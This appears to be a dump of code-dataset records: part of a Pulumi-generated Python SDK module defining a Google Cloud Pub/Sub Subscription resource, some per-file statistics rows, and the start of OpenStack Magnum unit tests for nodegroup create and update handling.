return pulumi.get(self, "ack_deadline_seconds")
@ack_deadline_seconds.setter
def ack_deadline_seconds(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ack_deadline_seconds", value)
@property
@pulumi.getter(name="deadLetterPolicy")
def dead_letter_policy(self) -> Optional[pulumi.Input['DeadLetterPolicyArgs']]:
"""
        A policy that specifies the conditions for dead lettering messages in this subscription. If dead_letter_policy is not set, dead lettering is disabled. The Cloud Pub/Sub service account associated with this subscription's parent project (i.e., service-{project_number}@gcp-sa-pubsub.iam.gserviceaccount.com) must have permission to Acknowledge() messages on this subscription.
"""
return pulumi.get(self, "dead_letter_policy")
@dead_letter_policy.setter
def dead_letter_policy(self, value: Optional[pulumi.Input['DeadLetterPolicyArgs']]):
pulumi.set(self, "dead_letter_policy", value)
@property
@pulumi.getter
def detached(self) -> Optional[pulumi.Input[bool]]:
"""
Indicates whether the subscription is detached from its topic. Detached subscriptions don't receive messages from their topic and don't retain any backlog. `Pull` and `StreamingPull` requests will return FAILED_PRECONDITION. If the subscription is a push subscription, pushes to the endpoint will not be made.
"""
return pulumi.get(self, "detached")
@detached.setter
def detached(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "detached", value)
@property
@pulumi.getter(name="enableMessageOrdering")
def enable_message_ordering(self) -> Optional[pulumi.Input[bool]]:
"""
If true, messages published with the same `ordering_key` in `PubsubMessage` will be delivered to the subscribers in the order in which they are received by the Pub/Sub system. Otherwise, they may be delivered in any order.
"""
return pulumi.get(self, "enable_message_ordering")
@enable_message_ordering.setter
def enable_message_ordering(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_message_ordering", value)
@property
@pulumi.getter(name="expirationPolicy")
def expiration_policy(self) -> Optional[pulumi.Input['ExpirationPolicyArgs']]:
"""
A policy that specifies the conditions for this subscription's expiration. A subscription is considered active as long as any connected subscriber is successfully consuming messages from the subscription or is issuing operations on the subscription. If `expiration_policy` is not set, a *default policy* with `ttl` of 31 days will be used. The minimum allowed value for `expiration_policy.ttl` is 1 day. If `expiration_policy` is set, but `expiration_policy.ttl` is not set, the subscription never expires.
"""
return pulumi.get(self, "expiration_policy")
@expiration_policy.setter
def expiration_policy(self, value: Optional[pulumi.Input['ExpirationPolicyArgs']]):
pulumi.set(self, "expiration_policy", value)
@property
@pulumi.getter
def filter(self) -> Optional[pulumi.Input[str]]:
"""
An expression written in the Pub/Sub [filter language](https://cloud.google.com/pubsub/docs/filtering). If non-empty, then only `PubsubMessage`s whose `attributes` field matches the filter are delivered on this subscription. If empty, then no messages are filtered out.
"""
return pulumi.get(self, "filter")
@filter.setter
def filter(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "filter", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
See Creating and managing labels.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="messageRetentionDuration")
def message_retention_duration(self) -> Optional[pulumi.Input[str]]:
"""
How long to retain unacknowledged messages in the subscription's backlog, from the moment a message is published. If `retain_acked_messages` is true, then this also configures the retention of acknowledged messages, and thus configures how far back in time a `Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or less than 10 minutes.
"""
return pulumi.get(self, "message_retention_duration")
@message_retention_duration.setter
def message_retention_duration(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "message_retention_duration", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the subscription. It must have the format `"projects/{project}/subscriptions/{subscription}"`. `{subscription}` must start with a letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or percent signs (`%`). It must be between 3 and 255 characters in length, and it must not start with `"goog"`.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="pushConfig")
def push_config(self) -> Optional[pulumi.Input['PushConfigArgs']]:
"""
If push delivery is used with this subscription, this field is used to configure it. At most one of `pushConfig` and `bigQueryConfig` can be set. If both are empty, then the subscriber will pull and ack messages using API methods.
"""
return pulumi.get(self, "push_config")
@push_config.setter
def push_config(self, value: Optional[pulumi.Input['PushConfigArgs']]):
pulumi.set(self, "push_config", value)
@property
@pulumi.getter(name="retainAckedMessages")
def retain_acked_messages(self) -> Optional[pulumi.Input[bool]]:
"""
        Indicates whether to retain acknowledged messages. If true, then messages are not expunged from the subscription's backlog, even if they are acknowledged, until they fall out of the `message_retention_duration` window. This must be true if you would like to [`Seek` to a timestamp](https://cloud.google.com/pubsub/docs/replay-overview#seek_to_a_time) in the past to replay previously-acknowledged messages.
"""
return pulumi.get(self, "retain_acked_messages")
@retain_acked_messages.setter
def retain_acked_messages(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "retain_acked_messages", value)
@property
@pulumi.getter(name="retryPolicy")
def retry_policy(self) -> Optional[pulumi.Input['RetryPolicyArgs']]:
"""
A policy that specifies how Pub/Sub retries message delivery for this subscription. If not set, the default retry policy is applied. This generally implies that messages will be retried as soon as possible for healthy subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline exceeded events for a given message.
"""
return pulumi.get(self, "retry_policy")
@retry_policy.setter
def retry_policy(self, value: Optional[pulumi.Input['RetryPolicyArgs']]):
pulumi.set(self, "retry_policy", value)
class Subscription(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ack_deadline_seconds: Optional[pulumi.Input[int]] = None,
dead_letter_policy: Optional[pulumi.Input[pulumi.InputType['DeadLetterPolicyArgs']]] = None,
detached: Optional[pulumi.Input[bool]] = None,
enable_message_ordering: Optional[pulumi.Input[bool]] = None,
expiration_policy: Optional[pulumi.Input[pulumi.InputType['ExpirationPolicyArgs']]] = None,
filter: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
message_retention_duration: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
push_config: Optional[pulumi.Input[pulumi.InputType['PushConfigArgs']]] = None,
retain_acked_messages: Optional[pulumi.Input[bool]] = None,
retry_policy: Optional[pulumi.Input[pulumi.InputType['RetryPolicyArgs']]] = None,
subscription_id: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
        Creates a subscription to a given topic. See the [resource name rules](https://cloud.google.com/pubsub/docs/admin#resource_names). If the subscription already exists, returns `ALREADY_EXISTS`. If the corresponding topic doesn't exist, returns `NOT_FOUND`. If the name is not provided in the request, the server will assign a random name for this subscription on the same project as the topic, conforming to the [resource name format](https://cloud.google.com/pubsub/docs/admin#resource_names). The generated name is populated in the returned Subscription object. Note that for REST API requests, you must specify a name in the request.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[int] ack_deadline_seconds: The approximate amount of time (on a best-effort basis) Pub/Sub waits for the subscriber to acknowledge receipt before resending the message. In the interval after the message is delivered and before it is acknowledged, it is considered to be *outstanding*. During that time period, the message will not be redelivered (on a best-effort basis). For pull subscriptions, this value is used as the initial value for the ack deadline. To override this value for a given message, call `ModifyAckDeadline` with the corresponding `ack_id` if using non-streaming pull or send the `ack_id` in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The minimum custom deadline you can specify is 10 seconds. The maximum custom deadline you can specify is 600 seconds (10 minutes). If this parameter is 0, a default value of 10 seconds is used. For push delivery, this value is also used to set the request timeout for the call to the push endpoint. If the subscriber never acknowledges the message, the Pub/Sub system will eventually redeliver the message.
        :param pulumi.Input[pulumi.InputType['DeadLetterPolicyArgs']] dead_letter_policy: A policy that specifies the conditions for dead lettering messages in this subscription. If dead_letter_policy is not set, dead lettering is disabled. The Cloud Pub/Sub service account associated with this subscription's parent project (i.e., service-{project_number}@gcp-sa-pubsub.iam.gserviceaccount.com) must have permission to Acknowledge() messages on this subscription.
:param pulumi.Input[bool] detached: Indicates whether the subscription is detached from its topic. Detached subscriptions don't receive messages from their topic and don't retain any backlog. `Pull` and `StreamingPull` requests will return FAILED_PRECONDITION. If the subscription is a push subscription, pushes to the endpoint will not be made.
:param pulumi.Input[bool] enable_message_ordering: If true, messages published with the same `ordering_key` in `PubsubMessage` will be delivered to the subscribers in the order in which they are received by the Pub/Sub system. Otherwise, they may be delivered in any order.
:param pulumi.Input[pulumi.InputType['ExpirationPolicyArgs']] expiration_policy: A policy that specifies the conditions for this subscription's expiration. A subscription is considered active as long as any connected subscriber is successfully consuming messages from the subscription or is issuing operations on the subscription. If `expiration_policy` is not set, a *default policy* with `ttl` of 31 days will be used. The minimum allowed value for `expiration_policy.ttl` is 1 day. If `expiration_policy` is set, but `expiration_policy.ttl` is not set, the subscription never expires.
:param pulumi.Input[str] filter: An expression written in the Pub/Sub [filter language](https://cloud.google.com/pubsub/docs/filtering). If non-empty, then only `PubsubMessage`s whose `attributes` field matches the filter are delivered on this subscription. If empty, then no messages are filtered out.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: See Creating and managing labels.
:param pulumi.Input[str] message_retention_duration: How long to retain unacknowledged messages in the subscription's backlog, from the moment a message is published. If `retain_acked_messages` is true, then this also configures the retention of acknowledged messages, and thus configures how far back in time a `Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or less than 10 minutes.
:param pulumi.Input[str] name: The name of the subscription. It must have the format `"projects/{project}/subscriptions/{subscription}"`. `{subscription}` must start with a letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or percent signs (`%`). It must be between 3 and 255 characters in length, and it must not start with `"goog"`.
:param pulumi.Input[pulumi.InputType['PushConfigArgs']] push_config: If push delivery is used with this subscription, this field is used to configure it. At most one of `pushConfig` and `bigQueryConfig` can be set. If both are empty, then the subscriber will pull and ack messages using API methods.
        :param pulumi.Input[bool] retain_acked_messages: Indicates whether to retain acknowledged messages. If true, then messages are not expunged from the subscription's backlog, even if they are acknowledged, until they fall out of the `message_retention_duration` window. This must be true if you would like to [`Seek` to a timestamp](https://cloud.google.com/pubsub/docs/replay-overview#seek_to_a_time) in the past to replay previously-acknowledged messages.
:param pulumi.Input[pulumi.InputType['RetryPolicyArgs']] retry_policy: A policy that specifies how Pub/Sub retries message delivery for this subscription. If not set, the default retry policy is applied. This generally implies that messages will be retried as soon as possible for healthy subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline exceeded events for a given message.
:param pulumi.Input[str] topic: The name of the topic from which this subscription is receiving messages. Format is `projects/{project}/topics/{topic}`. The value of this field will be `_deleted-topic_` if the topic has been deleted.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SubscriptionArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
        Creates a subscription to a given topic. See the [resource name rules](https://cloud.google.com/pubsub/docs/admin#resource_names). If the subscription already exists, returns `ALREADY_EXISTS`. If the corresponding topic doesn't exist, returns `NOT_FOUND`. If the name is not provided in the request, the server will assign a random name for this subscription on the same project as the topic, conforming to the [resource name format](https://cloud.google.com/pubsub/docs/admin#resource_names). The generated name is populated in the returned Subscription object. Note that for REST API requests, you must specify a name in the request.
:param str resource_name: The name of the resource.
:param SubscriptionArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SubscriptionArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
ack_deadline_seconds: Optional[pulumi.Input[int]] = None,
dead_letter_policy: Optional[pulumi.Input[pulumi.InputType['DeadLetterPolicyArgs']]] = None,
detached: Optional[pulumi.Input[bool]] = None,
enable_message_ordering: Optional[pulumi.Input[bool]] = None,
expiration_policy: Optional[pulumi.Input[pulumi.InputType['ExpirationPolicyArgs']]] = None,
filter: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
message_retention_duration: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
push_config: Optional[pulumi.Input[pulumi.InputType['PushConfigArgs']]] = None,
retain_acked_messages: Optional[pulumi.Input[bool]] = None,
retry_policy: Optional[pulumi.Input[pulumi.InputType['RetryPolicyArgs']]] = None,
subscription_id: Optional[pulumi.Input[str]] = None,
topic: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SubscriptionArgs.__new__(SubscriptionArgs)
__props__.__dict__["ack_deadline_seconds"] = ack_deadline_seconds
__props__.__dict__["dead_letter_policy"] = dead_letter_policy
__props__.__dict__["detached"] = detached
__props__.__dict__["enable_message_ordering"] = enable_message_ordering
__props__.__dict__["expiration_policy"] = expiration_policy
__props__.__dict__["filter"] = filter
__props__.__dict__["labels"] = labels
__props__.__dict__["message_retention_duration"] = message_retention_duration
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
__props__.__dict__["push_config"] = push_config
__props__.__dict__["retain_acked_messages"] = retain_acked_messages
__props__.__dict__["retry_policy"] = retry_policy
if subscription_id is None and not opts.urn:
raise TypeError("Missing required property 'subscription_id'")
__props__.__dict__["subscription_id"] = subscription_id
if topic is None and not opts.urn:
raise TypeError("Missing required property 'topic'")
__props__.__dict__["topic"] = topic
__props__.__dict__["state"] = None
__props__.__dict__["topic_message_retention_duration"] = None
super(Subscription, __self__).__init__(
'google-native:pubsub/v1:Subscription',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Subscription':
"""
Get an existing Subscription resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = SubscriptionArgs.__new__(SubscriptionArgs)
__props__.__dict__["ack_deadline_seconds"] = None
__props__.__dict__["dead_letter_policy"] = None
__props__.__dict__["detached"] = None
__props__.__dict__["enable_message_ordering"] = None
__props__.__dict__["expiration_policy"] = None
__props__.__dict__["filter"] = None
__props__.__dict__["labels"] = None
__props__.__dict__["message_retention_duration"] = None
__props__.__dict__["name"] = None
__props__.__dict__["push_config"] = None
__props__.__dict__["retain_acked_messages"] = None
__props__.__dict__["retry_policy"] = None
__props__.__dict__["state"] = None
__props__.__dict__["topic"] = None
__props__.__dict__["topic_message_retention_duration"] = None
return Subscription(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="ackDeadlineSeconds")
def ack_deadline_seconds(self) -> pulumi.Output[int]:
"""
The approximate amount of time (on a best-effort basis) Pub/Sub waits for the subscriber to acknowledge receipt before resending the message. In the interval after the message is delivered and before it is acknowledged, it is considered to be *outstanding*. During that time period, the message will not be redelivered (on a best-effort basis). For pull subscriptions, this value is used as the initial value for the ack deadline. To override this value for a given message, call `ModifyAckDeadline` with the corresponding `ack_id` if using non-streaming pull or send the `ack_id` in a `StreamingModifyAckDeadlineRequest` if using streaming pull. The minimum custom deadline you can specify is 10 seconds. The maximum custom deadline you can specify is 600 seconds (10 minutes). If this parameter is 0, a default value of 10 seconds is used. For push delivery, this value is also used to set the request timeout for the call to the push endpoint. If the subscriber never acknowledges the message, the Pub/Sub system will eventually redeliver the message.
"""
return pulumi.get(self, "ack_deadline_seconds")
@property
@pulumi.getter(name="deadLetterPolicy")
def dead_letter_policy(self) -> pulumi.Output['outputs.DeadLetterPolicyResponse']:
"""
        A policy that specifies the conditions for dead lettering messages in this subscription. If dead_letter_policy is not set, dead lettering is disabled. The Cloud Pub/Sub service account associated with this subscription's parent project (i.e., service-{project_number}@gcp-sa-pubsub.iam.gserviceaccount.com) must have permission to Acknowledge() messages on this subscription.
"""
return pulumi.get(self, "dead_letter_policy")
@property
@pulumi.getter
def detached(self) -> pulumi.Output[bool]:
"""
Indicates whether the subscription is detached from its topic. Detached subscriptions don't receive messages from their topic and don't retain any backlog. `Pull` and `StreamingPull` requests will return FAILED_PRECONDITION. If the subscription is a push subscription, pushes to the endpoint will not be made.
"""
return pulumi.get(self, "detached")
@property
@pulumi.getter(name="enableMessageOrdering")
def enable_message_ordering(self) -> pulumi.Output[bool]:
"""
If true, messages published with the same `ordering_key` in `PubsubMessage` will be delivered to the subscribers in the order in which they are received by the Pub/Sub system. Otherwise, they may be delivered in any order.
"""
return pulumi.get(self, "enable_message_ordering")
@property
@pulumi.getter(name="expirationPolicy")
def expiration_policy(self) -> pulumi.Output['outputs.ExpirationPolicyResponse']:
"""
A policy that specifies the conditions for this subscription's expiration. A subscription is considered active as long as any connected subscriber is successfully consuming messages from the subscription or is issuing operations on the subscription. If `expiration_policy` is not set, a *default policy* with `ttl` of 31 days will be used. The minimum allowed value for `expiration_policy.ttl` is 1 day. If `expiration_policy` is set, but `expiration_policy.ttl` is not set, the subscription never expires.
"""
return pulumi.get(self, "expiration_policy")
@property
@pulumi.getter
def filter(self) -> pulumi.Output[str]:
"""
An expression written in the Pub/Sub [filter language](https://cloud.google.com/pubsub/docs/filtering). If non-empty, then only `PubsubMessage`s whose `attributes` field matches the filter are delivered on this subscription. If empty, then no messages are filtered out.
"""
return pulumi.get(self, "filter")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Mapping[str, str]]:
"""
See Creating and managing labels.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="messageRetentionDuration")
def message_retention_duration(self) -> pulumi.Output[str]:
"""
How long to retain unacknowledged messages in the subscription's backlog, from the moment a message is published. If `retain_acked_messages` is true, then this also configures the retention of acknowledged messages, and thus configures how far back in time a `Seek` can be done. Defaults to 7 days. Cannot be more than 7 days or less than 10 minutes.
"""
return pulumi.get(self, "message_retention_duration")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the subscription. It must have the format `"projects/{project}/subscriptions/{subscription}"`. `{subscription}` must start with a letter, and contain only letters (`[A-Za-z]`), numbers (`[0-9]`), dashes (`-`), underscores (`_`), periods (`.`), tildes (`~`), plus (`+`) or percent signs (`%`). It must be between 3 and 255 characters in length, and it must not start with `"goog"`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="pushConfig")
def push_config(self) -> pulumi.Output['outputs.PushConfigResponse']:
"""
If push delivery is used with this subscription, this field is used to configure it. At most one of `pushConfig` and `bigQueryConfig` can be set. If both are empty, then the subscriber will pull and ack messages using API methods.
"""
return pulumi.get(self, "push_config")
@property
@pulumi.getter(name="retainAckedMessages")
def retain_acked_messages(self) -> pulumi.Output[bool]:
"""
        Indicates whether to retain acknowledged messages. If true, then messages are not expunged from the subscription's backlog, even if they are acknowledged, until they fall out of the `message_retention_duration` window. This must be true if you would like to [`Seek` to a timestamp](https://cloud.google.com/pubsub/docs/replay-overview#seek_to_a_time) in the past to replay previously-acknowledged messages.
"""
return pulumi.get(self, "retain_acked_messages")
@property
@pulumi.getter(name="retryPolicy")
def retry_policy(self) -> pulumi.Output['outputs.RetryPolicyResponse']:
"""
A policy that specifies how Pub/Sub retries message delivery for this subscription. If not set, the default retry policy is applied. This generally implies that messages will be retried as soon as possible for healthy subscribers. RetryPolicy will be triggered on NACKs or acknowledgement deadline exceeded events for a given message.
"""
return pulumi.get(self, "retry_policy")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
An output-only field indicating whether or not the subscription can receive messages.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter
def topic(self) -> pulumi.Output[str]:
"""
The name of the topic from which this subscription is receiving messages. Format is `projects/{project}/topics/{topic}`. The value of this field will be `_deleted-topic_` if the topic has been deleted.
"""
return pulumi.get(self, "topic")
@property
@pulumi.getter(name="topicMessageRetentionDuration")
def topic_message_retention_duration(self) -> pulumi.Output[str]:
"""
Indicates the minimum duration for which a message is retained after it is published to the subscription's topic. If this field is set, messages published to the subscription's topic in the last `topic_message_retention_duration` are always available to subscribers. See the `message_retention_duration` field in `Topic`. This field is set only in responses from the server; it is ignored if it is set in any requests.
"""
return pulumi.get(self, "topic_message_retention_duration")
| 77.614504
| 1,109
| 0.715097
| 5,379
| 40,670
| 5.256739
| 0.075851
| 0.043182
| 0.046364
| 0.020158
| 0.885203
| 0.841739
| 0.805206
| 0.778186
| 0.763085
| 0.735535
| 0
| 0.002885
| 0.198746
| 40,670
| 523
| 1,110
| 77.762906
| 0.864823
| 0.559897
| 0
| 0.430303
| 1
| 0
| 0.13893
| 0.046685
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154545
| false
| 0.00303
| 0.021212
| 0.006061
| 0.275758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b6a1201f30627dab1592e8bdf50e36dea2b6323a
| 178
|
py
|
Python
|
tests/snacks/mypkgdemo2/module5.py
|
msakamoto-sf/pythonsnack
|
20de2be963caa486f0bde68dd75cf417bd7f28b9
|
[
"Apache-2.0"
] | 1
|
2020-03-12T09:38:01.000Z
|
2020-03-12T09:38:01.000Z
|
tests/snacks/mypkgdemo2/module5.py
|
msakamoto-sf/pythonsnack
|
20de2be963caa486f0bde68dd75cf417bd7f28b9
|
[
"Apache-2.0"
] | null | null | null |
tests/snacks/mypkgdemo2/module5.py
|
msakamoto-sf/pythonsnack
|
20de2be963caa486f0bde68dd75cf417bd7f28b9
|
[
"Apache-2.0"
] | null | null | null |
def module5_sub(n1, n2, n3, n4):
return n1 - n2 - n3 - n4
class ClassInModule5:
@staticmethod
def sub(n1, n2, n3, n4):
return n1 - n2 - n3 - n4 - 3
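A short usage sketch, assuming the two definitions above are in scope:

assert module5_sub(10, 1, 2, 3) == 4           # 10 - 1 - 2 - 3
assert ClassInModule5.sub(10, 1, 2, 3) == 1    # 10 - 1 - 2 - 3 - 3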
| 19.777778
| 37
| 0.539326
| 27
| 178
| 3.518519
| 0.444444
| 0.168421
| 0.252632
| 0.336842
| 0.526316
| 0.526316
| 0.526316
| 0.526316
| 0.526316
| 0.526316
| 0
| 0.162393
| 0.342697
| 178
| 8
| 38
| 22.25
| 0.649573
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.333333
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
fcbaba3670a3323bec362954b5c96c628a0be916
| 11,655
|
py
|
Python
|
magnum/tests/unit/conductor/handlers/test_nodegroup_conductor.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 319
|
2015-04-01T01:36:14.000Z
|
2022-01-18T13:21:46.000Z
|
magnum/tests/unit/conductor/handlers/test_nodegroup_conductor.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 10
|
2015-06-05T20:12:46.000Z
|
2018-10-17T09:14:22.000Z
|
magnum/tests/unit/conductor/handlers/test_nodegroup_conductor.py
|
ajmadsen/magnum
|
042d2ad14489afcecf0a3bc4038e2333e2acb3fb
|
[
"Apache-2.0"
] | 254
|
2015-03-30T13:56:06.000Z
|
2022-03-26T03:40:22.000Z
|
# Copyright (c) 2018 European Organization for Nuclear Research.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from unittest.mock import patch
from heatclient import exc
from magnum.common import exception
from magnum.conductor.handlers import nodegroup_conductor
from magnum.objects import fields
from magnum.tests.unit.db import base as db_base
from magnum.tests.unit.objects import utils as obj_utils
class TestHandler(db_base.DbTestCase):
def setUp(self):
super(TestHandler, self).setUp()
self.handler = nodegroup_conductor.Handler()
self.cluster = obj_utils.create_test_cluster(self.context)
self.nodegroup = obj_utils.create_test_nodegroup(
self.context, cluster_id=self.cluster.uuid)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_create(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
nodegroup = mock.MagicMock()
self.handler.nodegroup_create(self.context, self.cluster, nodegroup)
mock_driver.create_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
nodegroup.create.assert_called_once()
nodegroup.save.assert_called_once()
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.CREATE_IN_PROGRESS,
nodegroup.status)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_create_failed(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = NotImplementedError("Test failure")
mock_driver.create_nodegroup.side_effect = side_effect
nodegroup = mock.MagicMock()
self.assertRaises(NotImplementedError, self.handler.nodegroup_create,
self.context, self.cluster, nodegroup)
mock_driver.create_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
nodegroup.create.assert_called_once()
nodegroup.save.assert_called_once()
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.CREATE_FAILED,
nodegroup.status)
self.assertEqual("Test failure", nodegroup.status_reason)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_create_failed_bad_request(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = exc.HTTPBadRequest("Bad request")
mock_driver.create_nodegroup.side_effect = side_effect
nodegroup = mock.MagicMock()
self.assertRaises(exception.InvalidParameterValue,
self.handler.nodegroup_create,
self.context, self.cluster, nodegroup)
mock_driver.create_nodegroup.assert_called_once_with(self.context,
self.cluster,
nodegroup)
nodegroup.create.assert_called_once()
nodegroup.save.assert_called_once()
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.CREATE_FAILED,
nodegroup.status)
self.assertEqual("ERROR: Bad request", nodegroup.status_reason)
@patch('magnum.drivers.common.driver.Driver.get_driver')
    def test_nodegroup_update(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
self.handler.nodegroup_update(self.context, self.cluster,
self.nodegroup)
mock_driver.update_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.UPDATE_IN_PROGRESS,
self.nodegroup.status)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_update_failed(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = NotImplementedError("Update failed")
mock_driver.update_nodegroup.side_effect = side_effect
self.assertRaises(NotImplementedError, self.handler.nodegroup_update,
self.context, self.cluster, self.nodegroup)
mock_driver.update_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.nodegroup.status)
self.assertEqual("Update failed", self.nodegroup.status_reason)
@patch('magnum.drivers.common.driver.Driver.get_driver')
def test_nodegroup_update_failed_bad_request(self, mock_get_driver):
mock_driver = mock.MagicMock()
mock_get_driver.return_value = mock_driver
side_effect = exc.HTTPBadRequest("Bad request")
mock_driver.update_nodegroup.side_effect = side_effect
self.assertRaises(exception.InvalidParameterValue,
self.handler.nodegroup_update,
self.context, self.cluster, self.nodegroup)
mock_driver.update_nodegroup.assert_called_once_with(self.context,
self.cluster,
self.nodegroup)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.cluster.status)
self.assertEqual(fields.ClusterStatus.UPDATE_FAILED,
self.nodegroup.status)
self.assertEqual("ERROR: Bad request", self.nodegroup.status_reason)
@patch('magnum.drivers.common.driver.Driver.get_driver')
